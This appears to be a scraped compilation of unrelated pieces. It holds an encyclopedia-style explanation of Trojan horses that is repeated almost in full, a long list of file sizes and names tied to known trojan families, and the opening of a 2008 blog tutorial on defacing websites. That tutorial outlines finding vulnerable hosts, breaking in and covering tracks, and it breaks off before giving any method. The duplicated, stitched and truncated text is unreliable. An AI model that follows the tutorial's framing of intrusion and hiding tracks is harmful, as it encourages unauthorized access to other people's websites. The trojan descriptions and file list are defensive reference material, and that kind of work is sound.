Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
Trojan ( bad ) Beware !!!!
Trojan horse well this term has many meanings .
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.

Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.

Trojan horse programs cannot operate autonomously, in contrast to some other types of malware , like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.
Definition

A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.

In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.

Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are
erasing or overwriting data on a computer.
encrypting files in a cryptoviral extortion attack.
corrupting files in a subtle way.
upload and download files.
allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)
spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
setting up networks of zombie computers in order to launch DDoS attacks or send spam.
spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
make screenshots.
logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
phish for bank or other account details, which can be used for criminal activities.
installing a backdoor on a computer system.
opening and closing CD-ROM tray

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.

Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.

Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.

Methods of Infection

The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.
0 Changelog Back Orifice Communications Library
0 Bla.bla BLA trojan
0 Ipn.101 DataRape
0 Nam.101 DataRape
0 Por.101 DataRape
0 Udp.101 DataRape
5 Disk1.id NetBus 2.0 Pro
6 sniff.pid Shaft
8 Anam.101 DataRape
9 Lastip.sdf Snid
10 Stamp-h.in Back Orifice Communications Library
10 Cd-it.zip Warpcom
12 Snid.ini Snid
14 Ghlope.ini UandMe
15 Vclcntl.dll AOL Buddy
23 Runme.bat Modem Jammer
23 Resource.h.dsg Oblivion Dropper Source Generator
24 Paradise.ini Masters Paradise
26 Io.dll Retribution
26 Sprocks.bmp Retribution
26 Diskf.dll Retribution
26 Reginf.ret Retribution
26 Subseven.set SubSeven 2.2
27 Winstart.bat CrazzyNet
28 Module1.bas Log
31 Setup.ini NetBus 2.0 Pro
31 Install.bat Trojan Hide Tool
39 Pack.cmd Logger
40 Client.ini NokNok
43 Closew.bat 2000 Cracks
43 Readme.txt Alcarys.G
44 Acconfig.h Xremote
46 Apxi.dll ICQ Pager
46 Tools.kip SubSARI
47 Pcinvader.cfg PC Invader
47 Trojan.vbw TailGunner
49 Autopoll.ini Masters Paradise
49 Setup.lid Mos**ker
50 Pack_off.h Back Orifice Communications Library
51 Explorer.exe Reven
52 Acid setup.vbw Acid Shivers
52 Script.mrc neXus
54 Pl.bat Eversaw
56 D[censored].ini Donald [censored]
56 Icqcrk.gif Paradise trojan
62 Nettrash.ini NetTrash
62 Oxon.ini Oxon
62 St5unst.exe WinGrab
64 Dir.txt BackGate Kit
64 Winini.tmp -8,554 bytesDrone.cfg Pioneer
64 Newvbs.reg Worms Generator
66 Connector.exe.sig Connector
68 Pref.ini Frenzy
68 Pwmodify.dat PsychWard
69 Setup.ini Mos**ker
70 Defs.h Back Orifice Communications Library
71 Win.drv BuggyWorm
72 Dedicado A.....txt Zevach
73 Rsrc.dsg Oblivion Dropper Source Generator
75 clear yoyo
83 Th3tr41t0r.vbw The Traitor (= th3tr41t0r)
89 Cha_du_ri.bat WCup
89 Dd.ini WCup
93 Password.txt Frethem
96 Dosya.kip SubSARI
97 Includes.dsg Oblivion Dropper Source Generator
101 Deltree.dll MuSka52
108 Ctcp.mrc neXus
111 00000001.COM On4ever
111 00000002.COM On4ever
111 00000003.COM On4ever
111 00000004.COM On4ever
112 Register.reg RUX The TIc.K
113 Config Guangwai Ghost
113 Necuser3.tye HD trojan
114 V.vbs Alcarys.G
114 Install.bat Blood Fest Evolution
117 Cfgwin32.reg BO dll
118 Register.reg RTB 666
119 Data.tag Mos**ker
120 Doc.dll MuSka52
122 Rsrc.rc BSE
122 Agent.ini Cyber Sensor
125 Index.reg Bitchin Threads
126 Xp.bat Jerm
127 Make.bat Rux
127 Korea_rulez.vbs WCup
132 -infect-.p$ NetBus
134 Start.cmd Logger
134 Korea_win_worldcup2002.vbs WCup
137 Fooled.com Fooled
138 Setup.pkg NetBus 2.0 Pro
142 Install.bat Hvl RAT
146 Start.bat Alcarys.G
150 Qskrypt1.qsc Q-taz
150 Koreans_.reg WCup
160 File_id.diz Cybernetic Cowb0y´s NetBus
160 Srver.exe The Invasor
161 Nix.cnt The Nix
164 Crazzynet.ini CrazzyNet
166 Makefile.am Back Orifice Communications Library
170 Log.mak Log
178 Ftpcmds.txt BackGate Kit
178 File_id.diz NetBus 2.0 Pro
189 Pddt.dat Mini BackLash
190 Pack_on.h Back Orifice Communications Library
192 Bofacil.ini BO Facil
196 Medusa.mrc Medusa
202 Settings.dll Ass Sniffer
206 Psetup.dat Progenic Mail Trojan Construction Kit
210 Startadore Adore rootkit
226 Autoftp.ini Autoftp1
227 Dl.1bat BackGate Kit
227 Carla.txt.vbs Zevach
228 Fooled.zip Fooled
230 Lee Esto!.txt Zevach
233 Crack.reg ASPack
233 Flelist.xml Nakter Affe
237 Autoftp1.vbw Autoftp1
246 Prog.ini Trapdoor
249 Hookdump.ini Hookdump
254 Register.reg AccKontrol
254 Register.reg Black Angel
263 Module1.bas EH trojan
265 Trojan.com RBBS
280 Wckoat.sig Trojan Hide Tool
286 Jokes.trj EasyTrojan
286 Fix.bat Rathead
288 Config.h.in Xremote
289 Compile.bat PECompact
298 *.sig Silk Rope
301 Options.ini Connect4
302 Commands.cfg Undetected
314 Gimmerand.c ADM worm
317 Syphillisserver.dpr Syphillis
322 File_id.diz neXus
324 Startup.lnk Pando
329 Acub.dll A-trojan
333 VIERIKA.JPG.VBS Vierika
344 Login.txt BackGate Kit
344 03.d BackGate Kit
348 Config.ini Gip
351 Script.ini BuggyWorm
353 Layout.bin Mos**ker
362 Config.h Xremote
369 Uploader.bat Rux
370 Changelog Xremote
378 Cdecl.h Back Orifice Communications Library
379 s**ker.trj EasyTrojan
386 Explorer.cfg ZA Killer
396 Solffcor.sh Solaris rootkit
397 Vbs_f**k.zip f**k
400 Install.log Trojan Hide Tool
406 Ddoly121.zip Doly Trojan
417 Os.dat Mos**ker
428 V.reg Alcarys.G
433 Pack.bat Connect4
433 Qtrodel.zip QtroDel / QreoDel
445 Wsock32.bat BuggyWorm
450 Msvbvm60.dll Daodan
454 Cr.vbs Eversaw
454 Readme.vbs Snav
456 Resource.h Enigma´s Setup Trojan
457 Resource.h Silk Rope
461 Mirc.fire.490.zip Fire
464 Skin.ini SubSeven
470 Plugex.dpr Undetected
482 Index.htm DSS
486 Timer98.bat Funtime Apocolypse
487 Secto.com Sector-Zero
492 Timernt.bat Funtime Apocolypse
527 Kcr.com KCR
528 Attacker.cfg Attacker
533 HTML_Shit.zip Shit Trojan
536 Aweblite.zip Aphex WebDownloader LITE
537 Servustartuplog.txt BackGate Kit
545 Gimmeip ADM worm
546 Vbs.rabbit.zip Rabbit
547 Setuptrojan.dsw Enigma´s Setup Trojan
553 Skin.ini Undetected
586 Ecat.com ECat
594 Element.txt Elem
595 Nerte.cnt NerTe
610 Com2exe.com Rux
616 Send.tgz Remote Administration Tool - RAT
630 Trojan_Shit.htm Shit Trojan
632 Skin.ini Backage
662 Calculus.exe Calculus
663 Satas.mrc SataS Scan Script
668 Trojan17.exe FliMod
670 Startup ADM worm
672 Acid setup.vbp Acid Shivers
678 About.com Gnotify
686 Ipxkcr.com KCR
686 Wprinter spitter.com Printer Spitter
688 Playkcr.com KCR
689 BlackDay.bat BlackDay
696 Bo2k-defs.h.in Back Orifice Communications Library
703 Chkperm.txt Solaris rootkit
710 Evilhtml_2.zip Evil HTML Format
721 S7config.cfg SubSeven 2.2
722 Mkinstalldirs Back Orifice Communications Library
726 Int09mon.com 9x Int 09 Moniter
730 DestroyerNT.zip God
763 Config.h.in Back Orifice Communications Library
764 Mdlstartup.bas Autoftp1
765 Incremental ADM worm
766 Element.ico Elem
768 Systrayicon.exe SubSeven
772 Libbo2k.dsw Back Orifice Communications Library
773 Qtaz20pl.diz Q-taz
774 Makefile.gen Adore rootkit
776 Prosiak.ini Prosiak
779 En-cid12.dat The 1-900 Trojan
781 Qtaz22.diz Q-taz
781 Qtaz23.diz Q-taz
797 Urls.ini neXus
801 Clientootlt.vbp EH trojan
807 All-root.zip allroot
809 Netbus.cnt NetBus 2.0 Pro
812 Backage32se.bagage Backage
823 Rat10.zip Remote Administration Tool - RAT
824 Xtratank.com Xtratank
825 Remotecntrl.mrc neXus
839 Nor.wps Alcarys.G
843 Christina_aguilera_nude!.vbs Reaper
844 Libbo2kspec Back Orifice Communications Library
844 Freejc.exe Free JC suite
846 Freejc2.exe Free JC suite
847 Libbo2k.spec.in Back Orifice Communications Library
852 Serverootlt.vbp EH trojan
868 Crack4jc.exe Free JC suite
872 Outlookjs.class GodWill
879 Backage3.ini Backage
887 Extract.dsg Oblivion Dropper Source Generator
888 Natas.url Natas
899 Aboutblank.htm Blank
915 Config.h Back Orifice Communications Library
926 V.com LFM-926
928 Email.vbs BuggyWorm
930 Audpserver A UDP backdoor
942 Malkavian.url Lucky2
958 Icqcrack.zip Apulia
964 Audpbackdoor.tar.gz A UDP backdoor
964 Geax105.com GetIt Keylogger
965 Strhandle.h Back Orifice Communications Library
967 Coldir.com Coldir trojan
967 Read-me.pif Golden Retriever
987 Th3tr41t0r.vbp The Traitor (= th3tr41t0r)
992 EX_Folder.zip EX_Folder
993 AOL4free.com AOL4FREE
996 Ghostdog.zip GhostDog
1008 Overquota.bat OverQuota
1014 All-root.c allroot
1014 Procspy.ini Cyber Sensor
1019 Getitsdw.com GetIt Keylogger
1024 Server.exe Mini Web Downloader
1028 Dailupraper.dep Dunrape
1032 Rat11.zip Remote Administration Tool - RAT
1035 Audpclient A UDP backdoor
1046 Win95.exe Free JC suite
1052 Winnt.exe Free JC suite
1055 Evilhtml2.zip Evil HTML Format
1067 Skin.ini Mos**ker
1076 Mskernel32.vbs Dayumi
1076 Gssh101.com GetIt Keylogger
1078 Icon1.ico Enigma´s Setup Trojan
1088 Alloyico.dll Alloy Executable Compiler
1088 Boy95.com SpyBoy
1094 Bad.dat Got You
1095 (version C) Pica
1100 17th.Inst.zip 17th.Inst
1122 Oggy_froggy1_2.zip Oggy Froggy
1137 Lame.cpp Lame
1148 Evil98.html Evil HTML Share
1148 Wing.ini WinGrab
1152 Screen.tpu EasyTrojan
1165 Setup.ini Alloy Executable Compiler
1169 Protools.com PECompact
1184 Miranda.zip Miranda
1187 Movie.avi.pif Homemade
1195 lbk.tar.gz lbk
1204 Winf**k.zip Winf**k
1218 Menu.cfg SubSeven 2.2
1235 Destroyernt.txt God
1243 Playkcr.zip KCR
1257 Trojan.vbp TailGunner
1281 Funtime95.hta Funtime Apocolypse
1281 Funtiment.hta Funtime Apocolypse
1285 Without.bat Without
1292 Ibug.ini neXus
1300 98sfix.bat Control trojan
1325 Ghostdog.com GhostDog
1330 Getitkeyloggsdw100r.zip GetIt Keylogger
1333 Passcrypt.zip QueBus
1339 Winf**k.bat Winf**k
1345 T0rnsb T0rn Rootkit
1357 Kcr.zip KCR
1366 EX_Folder.bat EX_Folder
1374 Giant.frm EH trojan
1382 Sz T0rn Rootkit
1383 Blitz.c BlitzNet
1408 Catman.com Catman trojan
1408 General.tpu EasyTrojan
1429 Configure.in Back Orifice Communications Library
1443 Skisetup.log Stealth Keyboard Interceptor Auto Sender
1454 Picard.vbs Lee
1455 Ffb24.c Solaris rootkit
1458 Modregistry.bas The Traitor (= th3tr41t0r)
1470 Ns.com Hackin' for Newbies
1478 Ipxkcr.zip KCR
1483 Scanconnect.c ADM worm
1489 Lion24.c Solaris rootkit
1489 Zip-troj.zip Zip trojan
1492 Commands.cfg Undetected
1511 Winsck.ini GateCrasher
1517 Teenslideshow.scr Sinep
1517 Winsystem.vbs Sinep
1531 Sam.htm Emailtips
1536 ~df127d.tmp CrazzyNet
1551 REQUESTED_INFO.DOC.vbs Req
1560 Commandloop.h Back Orifice Communications Library
1566 Cmoney.com Resizer
1578 Fservecheat.zip SubSeven scripts
1594 Evilnt.html Evil HTML Share
1594 Trojanrunnernt.txt God
1640 Lemon24.c Solaris rootkit
1668 Annhiliatent.txt God
1673 Evilhtml.zip Evil HTML Format
1690 Dtv31-lite-client.ini Deep Throat
1710 Script1.rc Enigma´s Setup Trojan
1710 Saranwrap.rc NokNok
1710 Silkrope.rc Silk Rope
1728 Uninstal.ini NetBuster Killer
1732 Ntshareme.html Evil HTML Share
1753 98shareme.html Evil HTML Share
1771 Miranda.com Miranda
1773 Multimedia.lte Multimedia, Lithium plug-in
1795 Plugins.h Back Orifice Communications Library
1807 Dccf**k.zip SubSeven scripts
1826 gH-cgi.c gH CGI Backdoor
1829 Xls.wps Alcarys.G
1836 Humanismo.html.vbs Manis
1858 Form3.frx The Traitor (= th3tr41t0r)
1877 FOTOS_YABRAN_VIVO_HOY.JPG.vbs Yabran
1917 Evil.html Evil HTML Format
1926 Runmenow.com HD trojan
1929 Trojan.frm TailGunner
1944 Frmcompleted.frm Autoftp1
1948 (B)Independance_Day.vbs Lee
1949 Utrojan.c Universal trojan
1950 Blank.html. 321 bytesDoc.wps Alcarys.G
1957 Dummy.c Adore rootkit
1971 Gravedad.zip Gravedad
2009 Deisl1.isu Trojan Hide Tool
2031 Bocomreg.h Back Orifice Communications Library
2035 Cleaner.c Adore rootkit
2037 Acid setup.zip Acid Shivers
2061 Pif worm emmapeel.zip Emma Peel
2063 English.ini Masters Paradise
2070 Cartolina.vbs Cartolina
2083 Upgradetowindowsxp.bat Jerm
2140 Notify.php Nawai
2143 Splash2.jpg GayOL
2146 Supernovae.999.zip SuperNova
2177 Autoftp1.vbp Autoftp1
2190 Hellyeah.zip Hellfirez
2192 Passwd_irix.c Password trojan
2195 Ds9.vbs Lee
2244 xmas.vbs Jean
2261 Cinstall.com Host Control
2275 Sys32.exe Cable
2278 El15_bmp.exe El15 BMP
2288 Commnet.h Back Orifice Communications Library
2296 Remote.ini neXus
2303 Stuff.mrc neXus
2310 Avkiller2.zip AVKillah
2317 Friend_message.txt.vbs FriendMess
2336 Illwill_info.exe Nawai
2336 Dod.mrc neXus
2353 Mirko.bat Krim
2355 Rush.tcl BlitzNet
2361 Beerwyrm.vbs Beerwyrm
2370 Edit_cfg.wri FTP SMTP
2383 Slist.mrc neXus
2392 Destroyer98.txt God
2407 Msinet.dep Cero
2407 Uninstal.ini Sensive
2417 Whatsnew.300 PKZip Trojan
2417 Freemp3s.vbs Resreg
2420 VBS.Lava.vbs Fiber
2422 VBS.Lava.vbs Fiber
2436 Homepage.html.vbs Homepage
2465 Mswinsck.dep Cero
2472 Frmlogin.fram Autoftp1
2494 Dropper.com Brebarka
2506 Imagehlp.dll MTX II
2519 Deutsch.ini Masters Paradise
2555 Pricol.exe Pricol
2576 Iohandler.h Back Orifice Communications Library
2592 Ocx.reg BusConquerer
2592 Ocx.reg NetBuster Killer
2592 Ocx.reg Psyber Stream Server
2601 Libinvisible.h Adore rootkit
2606 Kernel32.vbs PWStroy
2643 El15bmp.zip El15 BMP
2644 Worm_Elva.zip Elva
2649 Xremote.1 Xremote
2655 Breberka.txt .vbe Brebarka
2686 System.dll.vbs Bajar.B
2705 Vue testing service.txt.zip GhostDog
2709 Xremote.spec Xremote
2729 Psrace.c Solaris rootkit
2734 Annhiliate98.txt God
2734 Ircworm-julie.zip Julie
2758 Qfatc.zip Qfat
2784 Tsrpart.tpu EasyTrojan
2795 pp.pl Shaft
2803 kbdv2.c Linux loadable kernel module backdoor
2823 Oggy_fro.bat Oggy Froggy
2850 Encryption.h Back Orifice Communications Library
2853 Annakournikova.jpg.vbs OntheFly
2888 Nlc.mrc neXus
2918 Replace.mrc neXus
2922 Win32.cpp Back Orifice Communications Library
2922 Regclean.exe.js Olvort
2922 Regclean.exe.js Olvortex
2933 Brahma.jpg.vbs Rahma
2944 Serverootlt.frm EH trojan
2951 Cool_notepad_demo.txt.vbs CoolNote
2968 Configure Adore rootkit
2999 kbd.c Linux loadable kernel module backdoor
3008 Hosts.ip neXus
3008 Hosts.ip NokNok
3036 Nogzoeen.exe Nogzoeen
3062 Log.cgi Net-Devil CGI-logger
3072 Tloader1.exe K2 Turbo Loader
3072 Vbrun4x.dll K2 Turbo Loader
3072 Lang.exe Langex
3072 Webasylum.exe Web Asylum
3072 Server.exe WWWPW
3085 Trojanrunner98.txt God
3095 Upsddown.zip UpSideDown
3097 Folder.html Challenge
3104 Pager.exe ICQ Pager
3116 El15_bmp.zip El15 BMP
3124 17th.Inst.htm 17th.Inst
3141 Ban24.c Solaris rootkit
3178 Mawanella.vbs Mawanella
3193 Linkage.h Back Orifice Communications Library
3219 Dict.smp FTP SMTP
3232 Install.exe HD troj

ETHICAL HACKING -9 WEBSITE DEFACING HOW TO :

2008-08-04T10:39:00.000-07:00

So friends.....THIS IS HOW A HACKER START to deface a website by the following ways :

First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apologize. It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge ,that is what real hackers are made of. I don't encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc.. It is only right to put up some kind of warning. now go have fun Wink

This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vulnerable Hosts.
2. Getting In.
3. Covering Your Tracks

It really is easy, and I will show you how easy it is.

1. Finding Vulnerable Hosts
